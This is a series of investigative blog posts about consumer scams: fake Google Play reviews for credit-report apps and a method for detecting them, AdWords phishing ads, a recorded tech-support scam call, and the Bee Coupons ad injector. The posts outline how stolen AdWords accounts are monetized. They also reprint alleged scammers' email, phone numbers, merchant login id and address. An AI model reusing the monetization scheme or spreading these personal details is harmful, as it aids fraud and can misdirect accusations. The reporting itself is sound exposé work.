The Fair Credit Reporting Act ensures that Americans are granted a free credit report from Equifax, Experian and TransUnion once every twelve months. If you are fortunate enough not to encounter a scammer along the way to getting your free credit report, then you’ll most likely end up at  annualcreditreport.com

Unfortunately, not everyone is so lucky. The FTC has something to say about Websites that are exploiting folks looking for their free credit report:

Other websites that claim to offer “free credit reports,” “free credit scores,” or “free credit monitoring” are not part of the legally mandated free annual credit report program. In some cases, the “free” product comes with strings attached. For example, some sites sign you up for a supposedly “free” service that converts to one you have to pay for after a trial period. If you don’t cancel during the trial period, you may be unwittingly agreeing to let the company start charging fees to your credit card.

There’s no shortage of exploitation in this vertical on the Web, just do a couple of searches for yourself and take a close look at the ads. Be careful if you’re a scammer looking to get in on the action: the FTC may come knocking!

Moving away from the Web, and using your favorite Android device, a quick search for “free credit score” on the Google Play App store yields hundreds of results.

google-play-reviews-00

google-play-reviews-01

Of interest in this article are search results #2 and #3:

#2: Free Credit Report & Scores by Sinsation: this app has 10,000 downloads and a review score of 4.6 out of 5 stars.

google-play-reviews-02

#3: Credit Score Pro Free Reports by Amazing Apps Inc: 5,000 downloads and a 4.7 out of 5 review score

google-play-reviews-03

In this piece, I am not going to prove how bad these apps are. Legitimate users have saved me the hassle here by taking the time to write a review and warn anyone who was considering a download:

google-play-reviews-04

So these apps are up to precisely the type of nastiness that the FTC warned against, i.e., promising a free credit report but then having users sign up to a service to get it.

What the average user who has been tricked by these apps does not know, is that the apps are connected to one another in two very interesting ways.

Connection #1
The first connection is something you’d expect from an app/Web site discussed here: Affiliate Marketing.

Observation of the network activity behind each app [1, 2] shows us that they redirect through an affiliate link which then forwards on to the merchant that will pay the affiliate in the event of a sale: creditscorepro.com.

Note that both apps start with a GET request to a different .info domain (thegreatestever.info and thedatingconnection.info) before routing through to creditscorepro.com using the same affiliate id (AFID=278315), suggesting that the same entity is behind both apps. This is surprising because they are published under separate publishers (Sinsation & Amazing Apps Inc).

Now creditscorepro.com is not the bad guy here, they are trusting their affiliates not to get up to these types of shenanigans. You can take a look at their terms on a number of affiliate networks to verify this.

From their program on LinkConnector, note the language:

Due to FTC regulation, no “Free Credit Report” messaging

From their program on AffiliateWindow, note the language:

Due to FTC regulation, no “Free Credit Report” messaging

Also note that creditscorepro.com will pay the affiliate $26 per user that is sent their way. This is important because it is in this manner that the author of the apps is monetizing his/her efforts:

  1. Create an app and publish on the Google Play app store
  2. Market it as a means to get a free credit score
  3. Refer users of the app to creditscorepro.com through an affiliate network
  4. Creditscorepro.com pays affiliate network for each successful lead
  5. Affiliate network pays author of the app (profit!)

The affiliate behind these apps is using the ratespecial.com affiliate network, so we don’t get to see the precise terms that creditscore.com has on this network (due to them not being publicly available). It makes sense though that they have very similar terms to those on LinkConnector and AffiliateWindow.

What’s interesting on the ratespecial.com network is that their Terms and Conditions for the entire network do not accommodate affiliates using apps of this nature, in the text below they essentially limit their affiliates to the Web and Email:

5.    Restrictions. For any Engagement, subject to any greater restrictions in the applicable Accepted Offer Terms, Affiliate Network and or Publisher may promote the applicable RPS by banner advertisements, button links and/or text links (collectively hereafter the “Links”), contextual links for popup advertisements and email that is compliant with all applicable laws. Subject to the prior written and continuing approval of RateSpecial, promotional Links may contain the trade names, service marks, banners, buttons, and/or logos provided by RateSpecial on the Affiliate Network and or Publisher Portal for display on the websites used for Affiliate Network and or Publisher’s Engagement. Use of creative material that is not approved by RateSpecial will disqualify any resulting events from being “Actionable Events”. If the applicable Accepted Offer Terms says “WEB ONLY”, the foregoing materials are only allowed on the websites of Affiliate Network and or Publisher (and for avoidance of doubt cannot be used in email or in Links). If the applicable Accepted Offer Terms says “EMAIL ONLY”, Affiliate Network and or Publisher (and its agents) must limit the related promotional activities to emailing to lists, which for the avoidance of doubt are limited only to those created, managed, and treated in compliance with all applicable law. If the applicable Accepted Offer Terms says “CONTEXTUAL LINK ONLY”, then Affiliate Network and or Publisher may only promote RPS using Links, using them to direct potential customers of RPS directly to the website(s) designated in the Accepted Offer Terms.

Of course, as mentioned above we don’t get to see precisely what the Accepted Offer Terms are, but it’s probably in line with the terms of programs on other affiliate networks.

Connection #2
Two minutes into investigating apps of this nature one can’t help but wonder

“If these apps are such rubbish, then how is it that they each have thousands of downloads and so many favorable reviews?”

James Grubbs, a helpful reviewer from one of the apps above, has it all figured out:

google-play-reviews-05It just makes sense, these guys are faking their reviews.

If you take a deeper look at the reviews of each app, you’ll find that in fact there are quite a couple of reviews that are remarkably similar, but under different names:

google-play-reviews-07 google-play-reviews-06The red outline was added by me, it highlights portions of each review that are exactly the same.

After going through the awful reviews and carefully inspecting the network activity behind each of these apps, it’s obvious that they are designed to deceive. And yet in spite of this they number installs in the thousands and overall have an astounding review score of 4.6 out of 5 stars.

There’s something not quite right here, one or two fake reviews surely can’t do this.

With this in mind, I thought it would be interesting to investigate fake reviews on a larger scale in an effort answer the following question:

Are fake reviews a significant problem on the Google Play app store?

If one can’t trust the reviews of an app, then one must question the integrity of the entire store. After all, when the app store displays apps by “Top Paid”, “Top Free” and the like, it is surely including the number & nature of the reviews of each app as a factor when deciding where to rank them. It doesn’t take much to arrive to this conclusion, for there’s simply no anonymous “link” system to serve as part of a powerful ranking function as there is on the Web.

So to get to the bottom of this, I decided to first define a fake review using the two apps above as a basic frame of reference, keeping in mind that we want to minimize the chance of labeling a legitimate review as fake.

We take into account the following:

  •  The fake reviews we want to detect are those that intend to improve an app’s overall score in the store and not lower it, so we’re going to look for reviewers dishing out a minimum of a 4 star review for an app. Of course, there are scammers that will try to lower another app’s score (their competitors, in doing so they lower their ranking) but that’s not our focus today.
  • Fake reviews are going to be mostly generated by automation, and the result of something the SEO pundits call spinning: “rewriting existing articles, or parts of articles, and replacing specific words, phrases, sentences, or even entire paragraphs with any number of alternate versions to provide a slightly different variation with each spin”
  • Smaller reviews are obviously going to be very similar, if not exactly alike, to a number of other reviews. This just makes sense, just because the review “I love it” is everywhere does not mean they are all fakes. Scammers know this too, so they camouflage their reviews by keeping them short. Of course, every now and again the scammer gets creative, so instead of keeping things short, they spin long stories, which make for easier pickings when it comes to detection.

A brief overview on our method for detecting spinning is in order, for this is ultimately how we detect a fake review:

  • Break down each review into a set where each element is a word
  • Sets with less than N elements will not be considered. We have to be careful what value we choose for N here, the shorter it is then the more likely we are to increase the false positives rate. The two apps from above seem like a pretty good baseline, and it’s hard to argue that they are not fake. If you have a compelling argument as to why I’m wrong on this, please do get in touch. Otherwise, each review breaks down into 75 and 57 elements for each respective set. With this in mind, and in an effort to keep this simple enough so that someone without a degree in statistics/mathematics can easily follow along, we set our minimum review length to 50
  • We then take an intersection of each set with every other set. If the number of elements in an intersection is greater than a configurable threshold (aka their similarity in this case), then the sets are derivatives of one another and the associated reviews are marked accordingly, i.e., we have a fake review. The two reviews above are 73% similar to one another, so I chose to work with a 70% similarity in this experiment

The variables used are thus defined as follows:

  • Minimum set length (number of words in a review): 50
  • Minimum review score (score that the reviewer gave the app): 4
  • Minimum review similarity (similarity to another review in order to be considered as a fake): 70%

The Data
The data set used for our analysis includes all reviews of all apps found in the Google Play app store. On 2014-09-09 we indexed what was publicly available on the Google Play app store and found 2,719,686 reviews written by 2,084,818 reviewers of 852,137 apps.

Whilst this is great data it is by no means a 100% copy of what is in the Google store. The reason for this is because Google only exposes a fraction of the reviews for each app, you can verify this for yourself by loading up an app through Google Play on Android or via your Web Browser and trying to scroll through all of the reviews, note that only a small number of reviews are served.

Results
With a minimum set length of 50 and a review score of at least 4, we found 16,450 eligible reviews from 15,368 authors. Comparing every review to every other review, we found 172 reviews with at least 70% similarity to another review from a total of 82 authors. In this tab delimited file we tabulate the results in the form of details for each review along with the reviews that were similar to it and the similarity score.

Now consider a directed graph where edges are reviews, grey nodes are authors (labelled with the author id) and red nodes are apps (labelled with the app id that was reviewed). You can interpret the image below as “author 108446078933376544807 provided a fake review of the app with id appinventor.ai_northeastapps12.FreeCreditReport”

google-play-reviews-08

We know the review is fake because it is at least 70% similar to another review in the app store. Don’t be surprised that it is a free credit report app. Here’s the review written by author 108446078933376544807:

im a really big fan – everyone should use it its very important to know your credit score especially at this time around the holidays. im really glad i checked because it got me much better rates on a loan i applied for. i would suggest it for anyone who wants to check their scores on the go.. good thing is its sooo simple no bones about it, just gives you the report and score directly to your phone. easy to use it only took a couple minutes and i had both reports and scores. thankful that i found it

And here’s the same review of another app (appinventor.ai_GSDesign39200.BestPennyAuctions), from a different author (104192597425876737411), that was 98% similar:

fine im a really big fan – everyone should use it its very important to know your credit score especially at this time around the holidays. im really glad i checked because it got me much better rates on a loan i applied for. i would suggest it for anyone who wants to check their scores on the go.. good thing is its sooo simple no bones about it, just gives you the report and score directly to your phone. easy to use it only took a couple minutes and i had both reports and scores. thankful that i found it

So other than the word “fine” two separate authors for two separate apps had precisely 98 words and 507 characters that were exactly the same.

If you carefully examine the tab delimited file above, it’s evident that there are a number of reviews marked as fake that are not necessarily malevolent in nature, for example, when the same reviewer reviews two separate but similar applications: google-play-reviews-09

So author 114210272673494778688 reviewed the free and paid version of an app with precisely the same review:

this is an excellent memory game for young kids. it is biblically based and helps kids develop their memory and picture association. the sounds help kids remember where the animals are and can be turned off for more of a challenge.   my son (4 months) is too young to play it himself but he loved watching the animals and hearing the sounds. i would definitely recommend this game for anyone with kids!

The author is clearly not trying to hide what he is doing (100% review similarity from the same author) and the review itself seems genuine. Ordinarily one may be quick to add a condition which ignores the same reviews from the same authors, but then we’d be ignoring little clusters like these:

google-play-reviews-10The author here is simply pasting the following review verbatim for each app:

just like the content included with the main application, this add-on content is fantastic quality, incredibly realistic-sounding and certainly much better than what alternative applications are offering! whether this particular add-on is for you is personal preference, but at least with lightning bug you have a wide range of choices that sound great, work well and use very little storage space…

This author is obviously adding no value, and as we’ve shown it’s easy enough to detect this.

A quick look at the original author that kicked this project off:

google-play-reviews-11Michael Cohrs (author 105002329817833480149) did a fake review for CreditScorePro. This review was 100% similar to the review performed by Alvin Moses (104842832943339004409):

i tell my friends i would like to consider myself financially responsible so an app like this is just perfect for me. especially before making big purchases, its so important these days to know your score. that makes me so happy that i found an app on google that does exactly that, with no other stupid popup ads or anything like that to deal with. overall i guve it 4 stars

This review is also 100% similar to the review from Joyce Brothers (author 114529626562499288016) who reviewed FreeCreditScore, which includes a review from Kenda Minda (author 112746229244334005942, our original fake author) that is 96% similar:

google-play-reviews-12Easily detected rubbish reviews for near-five star rubbish apps.

Thus far the variables for defining a fake review have yielded a relatively small data set to explore, but it’s still fascinating what’s in there:

google-play-reviews-13In this cluster we have 5 authors responsible for 10 reviews of 4 apps:

  • Author 117831797660947426021’s review of com.martingamsby.orplus is 98% similar to the review from 107129133670198971212 and 89% similar to the review from 109575713192283562186
  • Author 117831797660947426021’s review of com.gobid is 100% similar to the review from 111772687247355872036 and 100% similar to the review from 102652010949230761474
  • Author 117831797660947426021’s review of com.mzdevelopment.musicsearch is 94% similar to the review from 102652010949230761474. Interesting from these two reviews is that the reviewer is merely shifting the order of words in the set (which we throw away and ignore thanks to the nature of how we detect fake reviews)
  • Author 117831797660947426021’s review of com.gappsolutions.skyman is 94% similar to the review from 102652010949230761474

Given that a cluster this interesting can be found with what is a fairly limiting constraint for eligible reviews (recall the min set length of 50), I decided to adjust the minimum set length by 20% to see if it would yield any more interesting results

  • Minimum set length (number of words in a review): 50   40
  • Minimum review score (score that the reviewer gave the app: 4
  • Minimum review similarity (similarity to another review in order to be considered as a fake): 70%

With these settings, we found 35,938 eligible reviews from 33,120 authors. Comparing every review to every other review, we found 336 reviews with at least 70% similarity to another review from a total of 161 authors. Results available in this tab delimited file.

The same cluster from above transforms into a larger cluster which now includes 10 authors responsible for 26 reviews of 11 apps.

google-play-reviews-14

The additions:

  • Author 116451052766263427395′s review of com.sndapps.zombiepiano is 100% similar to 106235084813202092445′s review of the same app
  • Author 116451052766263427395′s review of com.javi.hungry.dragon is 100% similar to 117054880620692184006′s review of the same app
  • Author 116451052766263427395′s review of com.DarkCarnival.Sharkz is 96% similar to 112114267199436446596′s review of the same app
  • Author 116451052766263427395′s review of com.tekbrix.findplus is 100% similar to 106718374237046178982′s review of the same app
  • Author 116451052766263427395′s review of com.selpheeinc.selphee is 100% similar to 109575713192283562186′s review of the same app
  • Author 116451052766263427395′s review of com.yoni.skyattack2 is 100% similar to 109575713192283562186′s review of the same app
  • Author 112114267199436446596′s review of air.com.nanico.skifleet is 100% similar to 109575713192283562186′s review of the same app

These reviews are obvious fakes: created or controlled by a single entity. At best they’re different instances from the same automation. Either way, what’s clear is that these reviews are junk. And if the reviews are junk then what does it say about the app reviewed? Moreover, what about the author? Well we know what it says about the author (automated), which really begs the question of what this says about the rest of the reviews written by these automatons (and the reviewed apps) that did not meet the conditions of this study. To get an idea of how much of a problem this is, I rebuilt the small graph above but added all reviews from the authors identified (now in orange) in the cluster above:

limited author ids - graph - bad authors to all reviews

Just answer the question!

So, are fake reviews a significant problem in the Google Play store?

Absolutely, and here’s why:

  • We ran a very simple algorithm against a fraction of the reviews in the Google Play store and yet we still found a surprising number of fake reviews, including some interesting clusters of badness. Obviously, such a simple algorithm was designed to find simple scammers, bottom of the barrel at the end of the day, really. So if we can find the simple guys with such a simple technique, who’s to say what the more capable scammers are up to? What’s arguably the most important issue here is that this confirms Google is not trying to detect & remove fake reviews, not even the simple ones
  • There’s quite a market for selling reviews. Spend ten minutes on fiverr and you’ll quickly get a feel for how much one pays for positive (and negative) reviews: $5 for 8 or $40 for 100. More enterprising publishers may consider employing the services of app2top.org who boast having sold more than 21,000 stars and 6,000 reviews. Their prices average $0.25 per review and are able to deliver up to 200 reviews per app per day

google-play-reviews-15My thanks to Ben Edelman for his thoughts on early versions of this article.

A reader sent me an email asking me to clarify the following statement from my last post:

“AdWords credentials are big bucks, more so if you phish a premium account.”

Platforms the likes of AdWords are constantly under attack. It’s astonishingly simple to verify this for yourself:

  • Head on over to google.com
  • Search for “adwords login”
  • Note the first ad

adwords_phishing_1

Inconsistencies with the first ad:

  • Display URL is for www.acefingerprint.com
  • Destination URL is for roofing-contractors-toronto.com

Clicking on the ad will land you here:

adwords_phishing_2Doesn’t get any easier than that to find someone attacking AdWords. Now remember, an attack on AdWords is an attack on all of the users of AdWords (Google’s advertisers). If Google is at the very least trying to protect their own vertical from abuse (their advertisers), then they’re not doing a very good job at it.

Once an attacker has valid AdWords credentials there are a few ways to monetize:

  1. Sell the account. Forums to sell a compromised account of this nature are in no short supply.
  2. Sell the traffic. The attacker brokers a relationship with someone who wants to buy traffic at a discount rate. This relationship most likely exists before the account was compromised. Attacker can offer huge volumes of traffic at ridiculous prices because the traffic she is selling is stolen (much like buying selling goods on the black market). Attacker can either modify the keywords of the compromised account to send targeted traffic, or just roll with what the account has anyway and maybe increase the bid price.
  3. Target a specific vertical and launder the traffic. At the end of the day, with a compromised account the attacker has free traffic. If it’s a premium account then the attacker has huge volumes of free traffic. An example of a premium account would be an advertiser who spends $10,000 a day on ads. When you’re dealing with the massive volumes that such a budget will bring, one has only to steer the traffic towards a somewhat probable monetization path and the machine will take care of the rest. For example, advertiser could set himself up as an affiliate in the Payday Loans vertical. Attacket then sets up an AdWords campaign in the Payday Loans vertical and sets her bid price to crush everyone else (it’s not her money, so why play nice?). Attacker funnels traffic from this campaign to a legitimate buffer site which launders traffic and forwards it on to the merchant facilitating Payday transactions/leads. Some of these will convert, which in turn will pay the attacker.

What’s still somewhat puzzling is why Google is not protecting their own vertical. If an AdWords account is compromised then the advertiser is going to lose money on ads that she did not purchase. If the advertiser loses this money then the advertiser is going to seek a refund. If the advertiser gets the refund then Google is going to lose money. If Google loses money then it’s within their interest to protect this vertical.

Of course, the simplest answer here may be that the cost of protecting this vertical (or any vertical) outweighs the cost of just issuing refunds in the event of a compromise. That’s fine from a pure monetary perspective, but what of the bad press that comes from posts the likes of what we saw on Reddit, or the future revenue lost from an advertiser who has had enough and shifts to an advertising platform that does invest in protecting their own vertical and those of their clients.

This Reddit post discusses an advertiser that is using Google’s AdWords system to phish Blockchain.info subscribers. If you’re not security/tech savvy, what this translates to is that an AdWords advertiser is tricking Google users into thinking that he/she is the face for another legitimate Web site. The idea is to steal user credentials.

As an attacker, using AdWords just makes sense. Why go through the all of the effort of organically growing a site to place high up in the organic rankings of Google, or even compromise an existing site, when Google AdWords will place you right at the top of the organic rankings for a small fee per user that they send your way. Using the AdWords system, an attacker can then precisely tune which region they want to target and even what time of day they would like the traffic to come their way.

One of the Reddit users posts

“The fact they allow this is ridiculous.”

Google does not allow this. Note the following from the AdWords Terms and Conditions:

“Ad Serving.  (a) Customer will not provide Ads containing malware, spyware or any other malicious code or knowingly breach or circumvent any Program security measure.”

One could make the argument that Google is just protecting themselves by adding this to their terms and conditions, and nothing more. Once Google has said that you’re not allowed to do this then they can wash their hands of all of this and only take a reactive approach, i.e., shut down an account when enough people complain

Leaving this argument at just this is insufficient to hold any weight though. The one problem with it, is that by Google not proactively searching for this nonsense then they themselves are open to precisely the same form of abuse.

Google AdWords Advertiser Targets Google AdWords

The advertiser highlighted by the red arrow below is phishing Google AdWords customers, using the Google AdWords infrastructure on the Google.com homepage when searching for “adwords”

adwords advertiser phishing adwords advertisersUpon clicking the ad, the user is redirected to the following landing page:

adwordsphishingNote this landing page is obviously not the official AdWords landing page. It is an attacker trying to lure unsuspecting victims into handing over their AdWords credentials. AdWords credentials are big bucks, more so if you phish a premium account. The attacker essentially acquires a powerful means with which to print money for himself until the account is closed.

Taking a closer look at the ad, note the inconsistencies:

  • The display URL (in green) is trasterosm2.com
  • The page I landed up at is friendsch.info
  • The destination URL (the first URL that a user is redirected to upon clicking the ad URL) is azmatkhans.com, surely a compromised site that is being exploited as a buffer for the redirect

The trick is that it’s easy to see these inconsistencies in review of an attack, but not in preview of a new AdWords campaign. When this advertiser first setup the campaign, the display URL probably matched the destination URL and in turn the final landing page. With some time and in sampling users for an attack (selecting 1 out of every 10 for example), the attacker can slowly creep his way into the system, even if Google is proactively searching for this form of abuse.

In the Tech Support scam, a scammer hijacks a well known brand in an effort to lure a victim who is then deceived into paying for an unnecessary/non-existent service or installing malware infected payloads.

This scam has been picked up by quite a few players in the last couple of years, successfully catching people left, right and center. If you want to bring yourself up to speed on how scammers have evolved in this space, you’ll find lots of documentation from the FTC, the Malwarebytes team and Microsoft.

When I think about a scam, of course the first question I ask is who is the victim, and eventually it’s interesting to figure out how the money flows. In today’s example, I’ll show you how a Tech Support scam flows from beginning to end. We’ll discuss who the victims are and we will examine the players that make money from all of this.

So with a couple of cell phones, a few false names and an intentionally flawed Virtual Machine (one which had not been activated) I decided to see what Tech Support scams looked like for myself.

The reason I chose a VM which had not yet been activated is because I wanted to see if the people I phoned for tech support pointed out the most obvious potential problem with the machine, i.e., that it had not yet been activated.

Online Advertising

On Friday the 23rd of May 2014, I found this Google advertiser:

google_advertiser_5_23It looks like he has an advertising campaign that is constantly running and targeting folks who are looking to log into their RoadRunner email:

5/23 – Google Advertiser URL leads to http://rrlogg.in/Log_In.htm
5/23 – Google Advertiser URL leads to http://rrhelp.in/Log_In.htm
5/24 – Google Advertiser URL leads to http://rrlogg.in/Log_In.htm
5/27 – Google Advertiser URL leads to http://www.rrlgn.in/Log_In_To_Account.htm

For each of these ads, the landing page will display the following message:

“Attention: Your Account Has Been Disabled Please Call 1-855-666-8849″

google_advertiser_tech_support_scam_0It’s obvious what is happening here, but to be clear: this advertiser has hijacked the TWC Road Runner login page and is trying to deceive the user into thinking that there is a problem.

Depending on your referrer to this page is (the site responsible for sending you here), the message could also be:

“Attention User Account Is Under Review Please Call RoadRunner Support 1-800-463-6338″

That the message/number changes matters not, for the intent remains the same: deception. In each case the advertiser has hijacked the TWC RoadRunner page and is trying to con the user into phoning the falsified tech support line.

What I thought is really interesting here is that they are not even bothering to steal credentials, they just want you to call in and fall victim to a quick scam that will send real dollars their way. Re the pic below, note that I entered false credentials and then pushed Login. Upon analyzing a packet trace for this activity, I found no evidence of credentials being sent to a server.

google_advertiser_tech_support_1Error code: RR-D68547 Your Email Account Has Been Temporary Suspended Due to Suspicious Activity Detected. Please RoadRunner Support on +1-800-463-6338

Not stealing credentials actually makes a whole lot of sense if you think about it a little. If they were stealing usernames and passwords then this would be an open and shut case. It would not take much for chaps like me to gather evidence against players that steal credentials in this manner, in which case they could land themselves in hot water pretty quickly.

Moving on, I called the guys behind 1-855-666-8849  a few times and each time I phoned they always answered with “Thank you for calling <GARBLED> technical support”. The <GARBLED> part is intentional from their side, they want you to think it’s your fault you did not hear them properly. Sometimes I asked what technical support they were, but I never got an answer.


Download audio

Unfortunately my initial attempts to get to the bottom of the scam didn’t get me very far. I think I came across as unconvincing, someone who may be a threat to their scam and so each time they ended up putting the phone down on me. Upon reflection, I think my problem was that I assumed that they were trying to sell me an antivirus solution from the get go, so my guess is this is what kept throwing them off. They would always tell me my computer was broken/compromised, that things had gone wrong and they needed to access it. They never told me how to facilitate this, I told them I had no idea what they were talking about and kept waiting for them to take the lead.

As I kept trying to see what this particular tech support scam was all about, it became evident to me that where other scammers were trying to get folks to download and install something, these guys were up to something different.

So I involved a senior citizen (my dad!), someone who I figured was the real target of their scam.

The result was quite different.

Download Audio

Highlights of the call:

04:50 scammers convince my father to let them take control of the machine. They ask him to load logmein123.com, this redirects to secure.logmeinrescue.com where they then ask him to enter the code 24227

logmein123

07:10 My father asks who they are, he clearly says “Are you TWC?” This is followed by a moment of silence and then their response “Yeah”

09:39 They have taken control of the machine, they then ask my father to log into his email so they can see the problem. What they did here was really sneaky. As he was typing in the password, they would keep pushing the caps lock key on their side, which meant that even if we were at the right service URL typing in the right credentials, it would be entered incorrectly and our login would be denied. This would open the doors for the scammers to prove that there certainly was a problem.

scammers 210:28 you can hear my father tapping the keyboard five times for a five character password and counting silently to himself. Mysteriously, a sixth character appears in the password prompt. Obviously scammers are entering the final character to keep forcing incorrect credentials.

scammers 411:30 scammer opens a command line window and types “EMAIL HAS BEEN HACKED”. My dad falls for this and starts to panic, when my father asks if his email has been hacked the scammer says “Yeah, that’s the problem sir, yeah”

scammers 5

13:58 scammer says “don’t worry, I am here to help you” whilst trying to scare my father by showing him logs from the Windows event log, all of which is completely normal

18:52 “are you a senior citizen sir?”

“Yes mam I am 76″

19:22 my father asks “are these experts from Microsoft?” to which the scammer responds “yes sir”

20:00 scammer explains to my father the difference between what Bestbuy’s Geek Squad offers and what they are offering. It’s all so confusing, but it’s supposed to be a good deal. Note the question my father asks at 20:50

“And these are specialized technicians from Microsoft, Yes”

“Yes”

scammers 6scammers 721:56 scammer loads up secure.nmi.com and logs in with merchant id “ishan.865tasu”

scammer 8 scammer 10For the first time we are privy to what their real identity may be, or at least what they are using to transfer funds: “International Technical Support Corporation”. If you’re following this call carefully, you know that the scammer just made a mistake on their side. They just logged my father directly into their merchant account obviously they don’t know that I just fell off the chair next to him.

22:50 They enter the Order ID ITSC102504 and will try to convince my father to complete the form with his details. Note the question my father asks before trying to complete the form

“Do you have special rates for over the age of 75?”

scammer 12

23:38 My father asks if he can spend the $599 over a period of time instead of one large payment. He explains that $600 is his rent for the month. They know he is an elderly gentleman, they know they are exploiting his trust. They know they are about to steal money that he cannot spare. What’s sad here is that my father is not a victim, but they don’t know that. How many elderly people have potentially fallen for this scam? We’re about to answer that questions thanks to these guys logging us into their merchant account.

26:18 scammer shares their address: “1113 6th ave, New Hyde Park, NY 11040″

31:00 scammer becomes impatient after we click refresh, nullifying everything we had spent the last ten minutes completing. She decides to transfer us to another scammer, but we decide to end her remote session and take a closer look at their merchant account.

Of interest to me at that point in time is how much money these unscrupulous individuals have made thus far. I used the Quickbooks feature of the merchant panel to get a quick idea.

scammer 13

Just to be clear here, for this account alone the scammers have conned 1538 people with this scam. At a total of $439,254.91, they are averaging $258 per person. What’s more terrifying here is the extremely low 3% rate of chargebacks/reversals. These are people that were savvy enough to see the scam and then demand a refund from their credit card company.

I shouldn’t have to say that this practice is unscrupulous. These are without a doubt scammers of the lowest possible order, bottom feeders that target old people and those that are not tech savvy enough to know any better.

The Players

1. Google facilitates the first part of this scam by allowing advertisers of this ilk onto their network. Average users, old people, kids, moms, tech elites, you name it, they trust the results given to them from a search engine. So why shouldn’t they trust what the page behind that first click tells them: “Attention: Your Account Has Been Disabled Please Call 1-855-666-8849″. After all, there’s no warning on the search result page saying “Hey be careful of these advertisers, we have no idea who they are or what they are going to try to sell you!”

Obviously the scammers know how trust is delegated here, so they will pay Google to exploit this as an advertiser for as long as they are allowed to do so.

But is Google a victim? Sure. Whilst they are taking the scammers money to show the ads in question, they are also indirectly a victim. Fingers will point to services the likes of theirs when one tracks back the scam to its origin.

2. NMI.COM – Network Merchants LLC, for a fee I presume, is allowing the money to flow from the target of the scam (my senior citizen dad in this case) through to the scammers. At the end of the day what the scammers are doing here is wire fraud, plain and simple. So if NMI didn’t know about the half million dollars these scammers potentially defrauded from victims before, they sure know about it now.

3. TWC Road Runner. They’re another victim. It’s their service that is being hijacked and their users plundered. Ultimately victims are dialing the support number listed because they thought TWC Road Runner disabled their account.

4. Microsoft. The scammers are using legitimate programs on a Microsoft Operating System to make the victims think something is wrong with Microsoft software. We know that it’s all just a lie though, the event  viewer is filled with legitimate warnings and errors. Typing “EMAIL HAS BEEN HACKED” in a command prompt does not mean that your email is hacked.

Furthermore, they hijack the Microsoft brand by saying that they are from Microsoft. Recall 19:22 where my father asks “are these experts from Microsoft?”

“yes sir”

5. The scammers themselves. From the Google ad landing pages, we know of three domains that they are using: rrlogg.in, rrlgn.in and rrhelp.in. Whois pages for these (here, here and here) list Dayanad Colony as the registrant using the number +91.9818290300 and email address karangosain2007@gmail.com

So what now?

Why are unscrupulous advertisers of this ilk allowed to run rampant? How is it that they can get away with something like this over and over again? Why aren’t the players responsible for playing a part in all of this (knowingly or unknowingly) made accountable here?

There’s no shortage of articles on bad guys like this [1,2,3,4] and from the merchant account above it’s obvious that these guys are profitable, so what gives?

The bottom line is that it’s the innocent consumers that are being nailed over and over again. Hard legal action coming in on the tail end of these scams is just not going to solve anything. In my mind I see the need for a very big and very angry gorilla stepping into the arena of online advertising sometime soon, and its name is regulation.

Updates

* 5/29/2014 – download links to the audio added *

* 6/3/2014 – scammer is still running strong through AdWords (Advertiser URL), now using the domain rrloginin.in and the number 1-855-808-1175 *

Search for “download skype”, “download google chrome”, “download firefox” or a myriad of other popular applications and you may find yourself unlucky enough to run into an ad injector.

Now an ad injector won’t present itself as an ad injector. Typically, it will bundle itself into an installer which will opt the user into installing a handful of programs onto her machine in addition to what she was originally looking for.

Sure, technical elites out there have no problem picking up on the subtle clues from an installer that an ad injector lies in waiting  (maybe they read the entire license agreement sometimes pointed to at the bottom of the screen), but less tech savvy folks think they are only getting what they were searching for. Nothing less, and arguably most important: nothing more.

Obviously, that’s not the case in today’s example, as we discuss an ad injector making the rounds and going by the name of Bee Coupons.

In the images below, with Bee Coupons installed courtesy of an installer on what was originally an uncompromised machine, I searched for “click fraud” on google.com. Google comes back with its responsive UI and I see exactly what I was expecting less than a second after pushing enter:

ad injectors and affiliate fraud may be good for business, but who's?Unfortunately, whilst Google was fetching its response to the “click fraud” query, Bee Coupons software was getting a result of its own. A few seconds pass and Bee Coupons decides to “enhance” Google’s search result with their own addition:

clickety clicky, kechang!

Of course the “enhanced results” aren’t really enhanced results at all, they’re ads. Upon clicking on those ads an advertiser will be charged a fee. The advertisers involved in this particular transaction are zoosk.com and ask.com. They may or may not be willing participants in this, for the online advertising ecosystem is fraught with so many complexities and third parties, that unless you sit and dissect a packet trace from start to finish every single time, it’s difficult to conclusively say who is who. Nonetheless, the odds are that Zoosk and Ask will be charged a fee upon a click.

But then where does the money go?

Good question, ordinarily the money would go to Google. You see, that’s how they fund the largest search engine on the planet, with ads from their own advertising network. More often than not they have a direct relationship with the advertiser. When Google is the publisher of an ad and the advertising network as well then they collect 100% of the fee. There are instances where Google is not the publisher of the ad, but facilitates delivery of the ad through their ad network, in which case Google still collects a fee from the advertiser, a portion of which is then given to the publisher.

I’m confused, how does Google make money here?

Google does not make money here, for whilst they are the publisher in this example they will not be paid upon someone clicking on the Zoosk or Ask ads. This is because those are ads that were not put there by Google. The ads belong to an entirely different advertising network that has hijacked the Google Search Result Page and inserted their own means of generating revenue.

Now the first rebuttal offered from an ad injector is that they received the permission of the user operating the computer in question to do this. Whilst this statement may be true (assuming the operator was not a child — popular target of installers), it’s inconsequential for they did not receive permission from the entity that mattered: the real publisher of the content, i.e., Google.

So to be clear, again, the ads that have been injected into Google’s site do not belong to Google.

So who do they belong to?

I clicked on the little “i” next to “Ads by Bee Coupons” and was directed to a page on advertising-support.com that offered to explain why I was seeing the ads in question:

You may be seeing ads as part of our advertising solution for Internet properties (such as websites or web browser extensions). This solution provides content at no cost to you and displays advertisements during your web browsing experience. It was installed by you, or someone using your computer.

“at no cost to you” is highlighted because this statement cannot always be true. If you are the publisher of content on the Web (say Google, for example) and Bee Coupons comes along and pushes your top advertisers down (who bid good money to be there) in order to make room for Bee Coupon’s advertisers, then there may indeed be a cost to you. The user that clicked on Bee Coupon’s ads did not click on your ads, which is ultimately money that should have been sent your way. Not earning when you could have is most definitely a cost and if you were Google in our example above then you shall bear the brunt of it.

What’s more interesting here is that the “advertising solution” installed on the machine (Bee Coupons in my case) is not available for download from advertising-support.com. In fact, I could not find any advertising solution software at all, and that’s where the installers come in.

Advertising-support.com

It’s worth spending a few more moments looking at advertising-support.com:

Revenue Skyrockets with Solutions from Advertising Support!

Solutions that are divided up into two categories, advertisers and publishers.bee_coupons_click_fraud_3

For advertisers:

advertising-support iPensatori comments
Competitive Rates This is the very reason why ad injectors exist at all, they offer competitive pricing. Instead of playing ball with the rest of the industry on advertising networks with established prices and that have permission to place their ads on a publisher’s site, advertisers enjoy better placements on premium publisher properties at lower rates with ad injectors
